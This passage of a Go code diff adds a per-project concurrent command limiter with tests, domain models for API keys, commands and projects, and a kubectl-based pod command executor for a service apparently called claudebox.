var ErrLimitExceeded = errors.New("concurrent command limit exceeded")
|
||||
|
||||
// Config defines the limiter configuration.
|
||||
type Config struct {
|
||||
// MaxConcurrentPerProject is the maximum concurrent commands per project.
|
||||
// Defaults to 5.
|
||||
MaxConcurrentPerProject int
|
||||
|
||||
// MaxConcurrentTotal is the maximum concurrent commands across all projects.
|
||||
// Defaults to 20.
|
||||
MaxConcurrentTotal int
|
||||
|
||||
// CommandTimeout is the maximum duration a command can hold a slot.
|
||||
// After this duration, the slot is automatically released.
|
||||
// Defaults to 30 minutes.
|
||||
CommandTimeout time.Duration
|
||||
}
|
||||
|
||||
// DefaultConfig returns sensible defaults.
|
||||
func DefaultConfig() Config {
|
||||
return Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 20,
|
||||
CommandTimeout: 30 * time.Minute,
|
||||
}
|
||||
}
|
||||
|
||||
// Limiter tracks and enforces concurrent command limits.
|
||||
type Limiter struct {
|
||||
cfg Config
|
||||
mu sync.Mutex
|
||||
projectCounts map[string]int
|
||||
totalCount int
|
||||
activeCommands map[string]*activeCommand
|
||||
}
|
||||
|
||||
type activeCommand struct {
|
||||
projectID string
|
||||
startedAt time.Time
|
||||
cancel context.CancelFunc
|
||||
}
|
||||
|
||||
// New creates a new concurrent command limiter.
|
||||
func New(cfg Config) *Limiter {
|
||||
if cfg.MaxConcurrentPerProject <= 0 {
|
||||
cfg.MaxConcurrentPerProject = 5
|
||||
}
|
||||
if cfg.MaxConcurrentTotal <= 0 {
|
||||
cfg.MaxConcurrentTotal = 20
|
||||
}
|
||||
if cfg.CommandTimeout <= 0 {
|
||||
cfg.CommandTimeout = 30 * time.Minute
|
||||
}
|
||||
|
||||
return &Limiter{
|
||||
cfg: cfg,
|
||||
projectCounts: make(map[string]int),
|
||||
activeCommands: make(map[string]*activeCommand),
|
||||
}
|
||||
}
|
||||
|
||||
// Acquire attempts to acquire a command slot for the given project.
|
||||
// Returns a release function that MUST be called when the command completes.
|
||||
// Returns ErrLimitExceeded if the limit is reached.
|
||||
func (l *Limiter) Acquire(ctx context.Context, projectID, commandID string) (release func(), err error) {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
|
||||
// Check total limit
|
||||
if l.totalCount >= l.cfg.MaxConcurrentTotal {
|
||||
return nil, ErrLimitExceeded
|
||||
}
|
||||
|
||||
// Check per-project limit
|
||||
if l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject {
|
||||
return nil, ErrLimitExceeded
|
||||
}
|
||||
|
||||
// Acquire the slot
|
||||
l.totalCount++
|
||||
l.projectCounts[projectID]++
|
||||
|
||||
// Create a context with timeout for automatic release
|
||||
cmdCtx, cancel := context.WithTimeout(ctx, l.cfg.CommandTimeout)
|
||||
|
||||
l.activeCommands[commandID] = &activeCommand{
|
||||
projectID: projectID,
|
||||
startedAt: time.Now(),
|
||||
cancel: cancel,
|
||||
}
|
||||
|
||||
// Start a goroutine to auto-release on timeout
|
||||
go func() {
|
||||
<-cmdCtx.Done()
|
||||
l.release(commandID)
|
||||
}()
|
||||
|
||||
// Return release function
|
||||
return func() {
|
||||
cancel()
|
||||
l.release(commandID)
|
||||
}, nil
|
||||
}
|
||||
|
||||
// release decrements the counters for a command.
|
||||
func (l *Limiter) release(commandID string) {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
|
||||
cmd, exists := l.activeCommands[commandID]
|
||||
if !exists {
|
||||
return // Already released
|
||||
}
|
||||
|
||||
delete(l.activeCommands, commandID)
|
||||
l.totalCount--
|
||||
l.projectCounts[cmd.projectID]--
|
||||
|
||||
if l.projectCounts[cmd.projectID] <= 0 {
|
||||
delete(l.projectCounts, cmd.projectID)
|
||||
}
|
||||
}
|
||||
|
||||
// Stats returns current usage statistics.
|
||||
func (l *Limiter) Stats() Stats {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
|
||||
projectStats := make(map[string]int)
|
||||
for k, v := range l.projectCounts {
|
||||
projectStats[k] = v
|
||||
}
|
||||
|
||||
return Stats{
|
||||
TotalActive: l.totalCount,
|
||||
MaxTotal: l.cfg.MaxConcurrentTotal,
|
||||
ProjectCounts: projectStats,
|
||||
MaxPerProject: l.cfg.MaxConcurrentPerProject,
|
||||
ActiveCommandIDs: l.getActiveCommandIDs(),
|
||||
}
|
||||
}
|
||||
|
||||
func (l *Limiter) getActiveCommandIDs() []string {
|
||||
ids := make([]string, 0, len(l.activeCommands))
|
||||
for id := range l.activeCommands {
|
||||
ids = append(ids, id)
|
||||
}
|
||||
return ids
|
||||
}
|
||||
|
||||
// Stats contains current limiter statistics.
|
||||
type Stats struct {
|
||||
TotalActive int
|
||||
MaxTotal int
|
||||
ProjectCounts map[string]int
|
||||
MaxPerProject int
|
||||
ActiveCommandIDs []string
|
||||
}
|
||||
|
||||
// IsProjectAtLimit checks if a project has reached its limit.
|
||||
func (l *Limiter) IsProjectAtLimit(projectID string) bool {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
return l.projectCounts[projectID] >= l.cfg.MaxConcurrentPerProject
|
||||
}
|
||||
|
||||
// IsTotalAtLimit checks if the total limit has been reached.
|
||||
func (l *Limiter) IsTotalAtLimit() bool {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
return l.totalCount >= l.cfg.MaxConcurrentTotal
|
||||
}
|
||||
|
||||
// ActiveCount returns the number of active commands for a project.
|
||||
func (l *Limiter) ActiveCount(projectID string) int {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
return l.projectCounts[projectID]
|
||||
}
|
||||
|
||||
// TotalActiveCount returns the total number of active commands.
|
||||
func (l *Limiter) TotalActiveCount() int {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
return l.totalCount
|
||||
}
|
||||
414
internal/cmdlimit/cmdlimit_test.go
Normal file
414
internal/cmdlimit/cmdlimit_test.go
Normal file
@ -0,0 +1,414 @@
|
||||
package cmdlimit
|
||||
|
||||
import (
|
||||
"context"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestNew(t *testing.T) {
|
||||
t.Run("default config", func(t *testing.T) {
|
||||
l := New(Config{})
|
||||
|
||||
if l.cfg.MaxConcurrentPerProject != 5 {
|
||||
t.Errorf("MaxConcurrentPerProject = %d, want 5", l.cfg.MaxConcurrentPerProject)
|
||||
}
|
||||
if l.cfg.MaxConcurrentTotal != 20 {
|
||||
t.Errorf("MaxConcurrentTotal = %d, want 20", l.cfg.MaxConcurrentTotal)
|
||||
}
|
||||
if l.cfg.CommandTimeout != 30*time.Minute {
|
||||
t.Errorf("CommandTimeout = %v, want 30m", l.cfg.CommandTimeout)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("custom config", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 10,
|
||||
MaxConcurrentTotal: 50,
|
||||
CommandTimeout: time.Hour,
|
||||
})
|
||||
|
||||
if l.cfg.MaxConcurrentPerProject != 10 {
|
||||
t.Errorf("MaxConcurrentPerProject = %d, want 10", l.cfg.MaxConcurrentPerProject)
|
||||
}
|
||||
if l.cfg.MaxConcurrentTotal != 50 {
|
||||
t.Errorf("MaxConcurrentTotal = %d, want 50", l.cfg.MaxConcurrentTotal)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestDefaultConfig(t *testing.T) {
|
||||
cfg := DefaultConfig()
|
||||
|
||||
if cfg.MaxConcurrentPerProject != 5 {
|
||||
t.Errorf("MaxConcurrentPerProject = %d, want 5", cfg.MaxConcurrentPerProject)
|
||||
}
|
||||
if cfg.MaxConcurrentTotal != 20 {
|
||||
t.Errorf("MaxConcurrentTotal = %d, want 20", cfg.MaxConcurrentTotal)
|
||||
}
|
||||
if cfg.CommandTimeout != 30*time.Minute {
|
||||
t.Errorf("CommandTimeout = %v, want 30m", cfg.CommandTimeout)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAcquire(t *testing.T) {
|
||||
t.Run("allows commands within limit", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 3,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Should allow 3 commands for project-a
|
||||
releases := make([]func(), 0)
|
||||
for i := 0; i < 3; i++ {
|
||||
release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune('a'+i)))
|
||||
if err != nil {
|
||||
t.Fatalf("Acquire %d failed: %v", i, err)
|
||||
}
|
||||
releases = append(releases, release)
|
||||
}
|
||||
|
||||
// Clean up
|
||||
for _, r := range releases {
|
||||
r()
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("rejects when per-project limit reached", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 2,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Acquire 2 slots
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
defer release1()
|
||||
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
|
||||
defer release2()
|
||||
|
||||
// Third should fail
|
||||
_, err := l.Acquire(ctx, "project-a", "cmd-3")
|
||||
if err != ErrLimitExceeded {
|
||||
t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("allows other projects when one is at limit", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 1,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Fill project-a
|
||||
releaseA, _ := l.Acquire(ctx, "project-a", "cmd-a")
|
||||
defer releaseA()
|
||||
|
||||
// project-b should still work
|
||||
releaseB, err := l.Acquire(ctx, "project-b", "cmd-b")
|
||||
if err != nil {
|
||||
t.Errorf("Acquire(project-b) error = %v, want nil", err)
|
||||
}
|
||||
defer releaseB()
|
||||
})
|
||||
|
||||
t.Run("rejects when total limit reached", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 3,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Fill total limit across different projects
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
defer release1()
|
||||
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
|
||||
defer release2()
|
||||
release3, _ := l.Acquire(ctx, "project-c", "cmd-3")
|
||||
defer release3()
|
||||
|
||||
// Fourth should fail even for new project
|
||||
_, err := l.Acquire(ctx, "project-d", "cmd-4")
|
||||
if err != ErrLimitExceeded {
|
||||
t.Errorf("Acquire() error = %v, want ErrLimitExceeded", err)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("release allows new commands", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 1,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Acquire and release
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
release1()
|
||||
|
||||
// Should be able to acquire again
|
||||
release2, err := l.Acquire(ctx, "project-a", "cmd-2")
|
||||
if err != nil {
|
||||
t.Errorf("Acquire() after release error = %v, want nil", err)
|
||||
}
|
||||
release2()
|
||||
})
|
||||
}
|
||||
|
||||
func TestStats(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 20,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
|
||||
release3, _ := l.Acquire(ctx, "project-b", "cmd-3")
|
||||
|
||||
stats := l.Stats()
|
||||
|
||||
if stats.TotalActive != 3 {
|
||||
t.Errorf("TotalActive = %d, want 3", stats.TotalActive)
|
||||
}
|
||||
if stats.MaxTotal != 20 {
|
||||
t.Errorf("MaxTotal = %d, want 20", stats.MaxTotal)
|
||||
}
|
||||
if stats.ProjectCounts["project-a"] != 2 {
|
||||
t.Errorf("ProjectCounts[project-a] = %d, want 2", stats.ProjectCounts["project-a"])
|
||||
}
|
||||
if stats.ProjectCounts["project-b"] != 1 {
|
||||
t.Errorf("ProjectCounts[project-b] = %d, want 1", stats.ProjectCounts["project-b"])
|
||||
}
|
||||
if len(stats.ActiveCommandIDs) != 3 {
|
||||
t.Errorf("ActiveCommandIDs length = %d, want 3", len(stats.ActiveCommandIDs))
|
||||
}
|
||||
|
||||
release1()
|
||||
release2()
|
||||
release3()
|
||||
}
|
||||
|
||||
func TestIsProjectAtLimit(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 2,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
if l.IsProjectAtLimit("project-a") {
|
||||
t.Error("IsProjectAtLimit should be false initially")
|
||||
}
|
||||
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
release2, _ := l.Acquire(ctx, "project-a", "cmd-2")
|
||||
|
||||
if !l.IsProjectAtLimit("project-a") {
|
||||
t.Error("IsProjectAtLimit should be true after reaching limit")
|
||||
}
|
||||
|
||||
release1()
|
||||
release2()
|
||||
}
|
||||
|
||||
func TestIsTotalAtLimit(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 2,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
if l.IsTotalAtLimit() {
|
||||
t.Error("IsTotalAtLimit should be false initially")
|
||||
}
|
||||
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
|
||||
|
||||
if !l.IsTotalAtLimit() {
|
||||
t.Error("IsTotalAtLimit should be true after reaching limit")
|
||||
}
|
||||
|
||||
release1()
|
||||
release2()
|
||||
}
|
||||
|
||||
func TestActiveCount(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
if l.ActiveCount("project-a") != 0 {
|
||||
t.Error("ActiveCount should be 0 initially")
|
||||
}
|
||||
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
|
||||
if l.ActiveCount("project-a") != 1 {
|
||||
t.Errorf("ActiveCount = %d, want 1", l.ActiveCount("project-a"))
|
||||
}
|
||||
|
||||
release1()
|
||||
|
||||
if l.ActiveCount("project-a") != 0 {
|
||||
t.Errorf("ActiveCount after release = %d, want 0", l.ActiveCount("project-a"))
|
||||
}
|
||||
}
|
||||
|
||||
func TestTotalActiveCount(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
if l.TotalActiveCount() != 0 {
|
||||
t.Error("TotalActiveCount should be 0 initially")
|
||||
}
|
||||
|
||||
release1, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
release2, _ := l.Acquire(ctx, "project-b", "cmd-2")
|
||||
|
||||
if l.TotalActiveCount() != 2 {
|
||||
t.Errorf("TotalActiveCount = %d, want 2", l.TotalActiveCount())
|
||||
}
|
||||
|
||||
release1()
|
||||
release2()
|
||||
|
||||
if l.TotalActiveCount() != 0 {
|
||||
t.Errorf("TotalActiveCount after release = %d, want 0", l.TotalActiveCount())
|
||||
}
|
||||
}
|
||||
|
||||
func TestConcurrentAccess(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 10,
|
||||
MaxConcurrentTotal: 100,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
var successCount, failCount int64
|
||||
var mu sync.Mutex
|
||||
|
||||
// Spawn many goroutines trying to acquire
|
||||
for i := 0; i < 150; i++ {
|
||||
wg.Add(1)
|
||||
go func(idx int) {
|
||||
defer wg.Done()
|
||||
|
||||
release, err := l.Acquire(ctx, "project-a", "cmd-"+string(rune(idx)))
|
||||
mu.Lock()
|
||||
if err == nil {
|
||||
successCount++
|
||||
mu.Unlock()
|
||||
time.Sleep(10 * time.Millisecond)
|
||||
release()
|
||||
} else {
|
||||
failCount++
|
||||
mu.Unlock()
|
||||
}
|
||||
}(i)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
|
||||
// Should have had some successes and some failures
|
||||
if successCount == 0 {
|
||||
t.Error("Expected some successful acquires")
|
||||
}
|
||||
if failCount == 0 {
|
||||
t.Error("Expected some failed acquires (limit exceeded)")
|
||||
}
|
||||
}
|
||||
|
||||
func TestAutoReleaseOnTimeout(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 1,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: 100 * time.Millisecond,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
// Acquire a slot
|
||||
_, err := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
if err != nil {
|
||||
t.Fatalf("Acquire failed: %v", err)
|
||||
}
|
||||
|
||||
// Should be at limit
|
||||
if !l.IsProjectAtLimit("project-a") {
|
||||
t.Error("Should be at limit after acquire")
|
||||
}
|
||||
|
||||
// Wait for timeout
|
||||
time.Sleep(150 * time.Millisecond)
|
||||
|
||||
// Should be auto-released
|
||||
if l.IsProjectAtLimit("project-a") {
|
||||
t.Error("Should not be at limit after auto-release")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDoubleRelease(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 5,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
ctx := context.Background()
|
||||
|
||||
release, _ := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
|
||||
// Release twice - should not panic or cause issues
|
||||
release()
|
||||
release()
|
||||
|
||||
// Count should be 0, not negative
|
||||
if l.ActiveCount("project-a") != 0 {
|
||||
t.Errorf("ActiveCount after double release = %d, want 0", l.ActiveCount("project-a"))
|
||||
}
|
||||
}
|
||||
|
||||
func TestContextCancellation(t *testing.T) {
|
||||
l := New(Config{
|
||||
MaxConcurrentPerProject: 1,
|
||||
MaxConcurrentTotal: 10,
|
||||
CommandTimeout: time.Minute,
|
||||
})
|
||||
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
|
||||
// Acquire a slot
|
||||
_, err := l.Acquire(ctx, "project-a", "cmd-1")
|
||||
if err != nil {
|
||||
t.Fatalf("Acquire failed: %v", err)
|
||||
}
|
||||
|
||||
// Cancel the context
|
||||
cancel()
|
||||
|
||||
// Give goroutine time to process
|
||||
time.Sleep(50 * time.Millisecond)
|
||||
|
||||
// Should be auto-released due to context cancellation
|
||||
if l.IsProjectAtLimit("project-a") {
|
||||
t.Error("Should be released after context cancellation")
|
||||
}
|
||||
}
|
||||
83
internal/domain/apikey.go
Normal file
83
internal/domain/apikey.go
Normal file
@ -0,0 +1,83 @@
|
||||
package domain
|
||||
|
||||
import "time"
|
||||
|
||||
// APIKeyID is a strongly-typed identifier for API keys.
|
||||
type APIKeyID string
|
||||
|
||||
// Scope represents a permission scope for API keys.
|
||||
type Scope string
|
||||
|
||||
const (
|
||||
ScopeAdmin Scope = "admin"
|
||||
ScopeProjectsRead Scope = "projects:read"
|
||||
ScopeProjectsExecute Scope = "projects:execute"
|
||||
ScopeKeysManage Scope = "keys:manage"
|
||||
)
|
||||
|
||||
// APIKey represents an API key for authentication.
|
||||
type APIKey struct {
|
||||
ID APIKeyID
|
||||
Name string
|
||||
KeyPrefix string // First 8 chars of key for identification
|
||||
Scopes []Scope
|
||||
ProjectIDs []ProjectID // nil = access to all projects
|
||||
CreatedAt time.Time
|
||||
ExpiresAt *time.Time
|
||||
LastUsedAt *time.Time
|
||||
RevokedAt *time.Time
|
||||
CreatedBy string
|
||||
}
|
||||
|
||||
// IsExpired returns true if the key has expired.
|
||||
func (k *APIKey) IsExpired() bool {
|
||||
if k.ExpiresAt == nil {
|
||||
return false
|
||||
}
|
||||
return time.Now().After(*k.ExpiresAt)
|
||||
}
|
||||
|
||||
// IsRevoked returns true if the key has been revoked.
|
||||
func (k *APIKey) IsRevoked() bool {
|
||||
return k.RevokedAt != nil
|
||||
}
|
||||
|
||||
// IsActive returns true if the key is valid for use.
|
||||
func (k *APIKey) IsActive() bool {
|
||||
return !k.IsRevoked() && !k.IsExpired()
|
||||
}
|
||||
|
||||
// HasScope returns true if the key has the specified scope.
|
||||
func (k *APIKey) HasScope(scope Scope) bool {
|
||||
// Admin scope grants all permissions
|
||||
for _, s := range k.Scopes {
|
||||
if s == ScopeAdmin || s == scope {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// HasAnyScope returns true if the key has any of the specified scopes.
|
||||
func (k *APIKey) HasAnyScope(scopes ...Scope) bool {
|
||||
for _, scope := range scopes {
|
||||
if k.HasScope(scope) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// HasProjectAccess returns true if the key can access the given project.
|
||||
func (k *APIKey) HasProjectAccess(projectID ProjectID) bool {
|
||||
// Admin or nil project list means access to all projects
|
||||
if k.HasScope(ScopeAdmin) || k.ProjectIDs == nil {
|
||||
return true
|
||||
}
|
||||
for _, pid := range k.ProjectIDs {
|
||||
if pid == projectID {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
47
internal/domain/command.go
Normal file
47
internal/domain/command.go
Normal file
@ -0,0 +1,47 @@
|
||||
package domain
|
||||
|
||||
import "time"
|
||||
|
||||
// CommandID is a strongly-typed identifier for commands.
|
||||
type CommandID string
|
||||
|
||||
// CommandType represents the type of command being executed.
|
||||
type CommandType string
|
||||
|
||||
const (
|
||||
CommandTypeClaude CommandType = "claude"
|
||||
CommandTypeShell CommandType = "shell"
|
||||
CommandTypeGit CommandType = "git"
|
||||
)
|
||||
|
||||
// Command represents a command to execute in a project's pod.
|
||||
type Command struct {
|
||||
ID CommandID
|
||||
ProjectID ProjectID
|
||||
Type CommandType
|
||||
Args []string
|
||||
StartedAt time.Time
|
||||
}
|
||||
|
||||
// CommandResult represents the outcome of command execution.
|
||||
type CommandResult struct {
|
||||
CommandID CommandID
|
||||
ExitCode int
|
||||
DurationMs int64
|
||||
Error error
|
||||
}
|
||||
|
||||
// Success returns true if the command completed successfully.
|
||||
func (r *CommandResult) Success() bool {
|
||||
return r.Error == nil && r.ExitCode == 0
|
||||
}
|
||||
|
||||
// OutputLine represents a single line of command output.
|
||||
type OutputLine struct {
|
||||
Stream string // "stdout" or "stderr"
|
||||
Line string
|
||||
Timestamp time.Time
|
||||
}
|
||||
|
||||
// OutputHandler is called for each line of output from a command.
|
||||
type OutputHandler func(line OutputLine)
|
||||
37
internal/domain/errors.go
Normal file
37
internal/domain/errors.go
Normal file
@ -0,0 +1,37 @@
|
||||
package domain
|
||||
|
||||
import "errors"
|
||||
|
||||
// Domain errors - these are business-level errors that should be translated
|
||||
// to appropriate HTTP status codes or gRPC error codes by the presentation layer.
|
||||
var (
|
||||
// Project errors
|
||||
ErrProjectNotFound = errors.New("project not found")
|
||||
ErrProjectNotRunning = errors.New("project is not running")
|
||||
|
||||
// Command errors
|
||||
ErrCommandNotFound = errors.New("command not found")
|
||||
ErrCommandTimeout = errors.New("command timed out")
|
||||
ErrCommandCancelled = errors.New("command was cancelled")
|
||||
ErrLimitExceeded = errors.New("concurrent command limit exceeded")
|
||||
ErrInvalidCommand = errors.New("invalid command")
|
||||
ErrCommandSanitization = errors.New("command failed sanitization")
|
||||
|
||||
// API Key errors
|
||||
ErrKeyNotFound = errors.New("api key not found")
|
||||
ErrKeyRevoked = errors.New("api key has been revoked")
|
||||
ErrKeyExpired = errors.New("api key has expired")
|
||||
ErrKeyInvalid = errors.New("invalid api key format")
|
||||
|
||||
// Authorization errors
|
||||
ErrUnauthorized = errors.New("unauthorized")
|
||||
ErrForbidden = errors.New("forbidden")
|
||||
ErrInsufficientScope = errors.New("insufficient scope")
|
||||
|
||||
// Rate limiting errors
|
||||
ErrRateLimited = errors.New("rate limit exceeded")
|
||||
|
||||
// Infrastructure errors (should typically be wrapped)
|
||||
ErrDatabaseConnection = errors.New("database connection error")
|
||||
ErrKubernetesError = errors.New("kubernetes error")
|
||||
)
|
||||
38
internal/domain/project.go
Normal file
38
internal/domain/project.go
Normal file
@ -0,0 +1,38 @@
|
||||
// Package domain contains pure domain models with no external dependencies.
|
||||
// These types represent the core business concepts of the application.
|
||||
package domain
|
||||
|
||||
// ProjectID is a strongly-typed identifier for projects.
|
||||
type ProjectID string
|
||||
|
||||
// Project represents a claudebox project that can execute commands.
|
||||
type Project struct {
|
||||
ID ProjectID
|
||||
Name string
|
||||
Description string
|
||||
PodName string
|
||||
Status ProjectStatus
|
||||
Workspace string
|
||||
}
|
||||
|
||||
// ProjectStatus represents the current state of a project's pod.
|
||||
type ProjectStatus string
|
||||
|
||||
const (
|
||||
ProjectStatusRunning ProjectStatus = "running"
|
||||
ProjectStatusPending ProjectStatus = "pending"
|
||||
ProjectStatusFailed ProjectStatus = "failed"
|
||||
ProjectStatusNotFound ProjectStatus = "not_found"
|
||||
ProjectStatusUnknown ProjectStatus = "unknown"
|
||||
ProjectStatusError ProjectStatus = "error"
|
||||
)
|
||||
|
||||
// IsAvailable returns true if the project can accept commands.
|
||||
func (s ProjectStatus) IsAvailable() bool {
|
||||
return s == ProjectStatusRunning
|
||||
}
|
||||
|
||||
// IsTerminal returns true if the status is a final state.
|
||||
func (s ProjectStatus) IsTerminal() bool {
|
||||
return s == ProjectStatusFailed || s == ProjectStatusNotFound
|
||||
}
|
||||
@ -52,6 +52,17 @@ type Result struct {
|
||||
// OutputHandler is called for each line of output from the command.
|
||||
type OutputHandler func(stream string, line string)
|
||||
|
||||
// CommandExecutor defines the interface for executing commands in pods.
|
||||
// This interface enables testing with mock implementations.
|
||||
type CommandExecutor interface {
|
||||
Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result
|
||||
PodExists(ctx context.Context, podName string) (bool, error)
|
||||
CheckConnection(ctx context.Context) error
|
||||
}
|
||||
|
||||
// Ensure Executor implements CommandExecutor at compile time.
|
||||
var _ CommandExecutor = (*Executor)(nil)
|
||||
|
||||
// Exec executes a command in the specified pod.
|
||||
// It streams output to the provided handler and returns when complete.
|
||||
func (e *Executor) Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result {
|
||||
@ -161,6 +172,30 @@ func (e *Executor) CheckConnection(ctx context.Context) error {
|
||||
return cmd.Run()
|
||||
}
|
||||
|
||||
// ExecSimple executes a shell command and returns the output as a string.
|
||||
// This is a convenience method for simple commands that don't need streaming.
|
||||
func (e *Executor) ExecSimple(podName, command string) (string, error) {
|
||||
e.mu.RLock()
|
||||
namespace := e.namespace
|
||||
e.mu.RUnlock()
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
|
||||
defer cancel()
|
||||
|
||||
args := []string{
|
||||
"exec", "-n", namespace, podName, "-c", "claudebox", "--",
|
||||
"bash", "-c", command,
|
||||
}
|
||||
|
||||
cmd := exec.CommandContext(ctx, "kubectl", args...)
|
||||
output, err := cmd.CombinedOutput()
|
||||
if err != nil {
|
||||
return string(output), err
|
||||
}
|
||||
|
||||
return string(output), nil
|
||||
}
|
||||
|
||||
// PodExists checks if a pod exists and is running.
|
||||
func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) {
|
||||
e.mu.RLock()
|
||||
|
||||
359
internal/executor/executor_test.go
Normal file
359
internal/executor/executor_test.go
Normal file
@ -0,0 +1,359 @@
|
||||
package executor
|
||||
|
||||
import (
|
||||
"context"
|
||||
"os/exec"
|
||||
"strings"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestNew(t *testing.T) {
|
||||
e := New("test-namespace")
|
||||
if e.namespace != "test-namespace" {
|
||||
t.Errorf("namespace = %q, want %q", e.namespace, "test-namespace")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCommand_Types(t *testing.T) {
|
||||
tests := []struct {
|
||||
cmdType CommandType
|
||||
want string
|
||||
}{
|
||||
{CommandTypeClaude, "claude"},
|
||||
{CommandTypeShell, "shell"},
|
||||
{CommandTypeGit, "git"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(string(tt.cmdType), func(t *testing.T) {
|
||||
if string(tt.cmdType) != tt.want {
|
||||
t.Errorf("CommandType = %q, want %q", tt.cmdType, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_buildArgs(t *testing.T) {
|
||||
e := New("apps")
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
cmd *Command
|
||||
wantArgs []string
|
||||
wantErr bool
|
||||
}{
|
||||
{
|
||||
name: "claude command",
|
||||
cmd: &Command{
|
||||
ID: "cmd-1",
|
||||
PodName: "claudebox-test",
|
||||
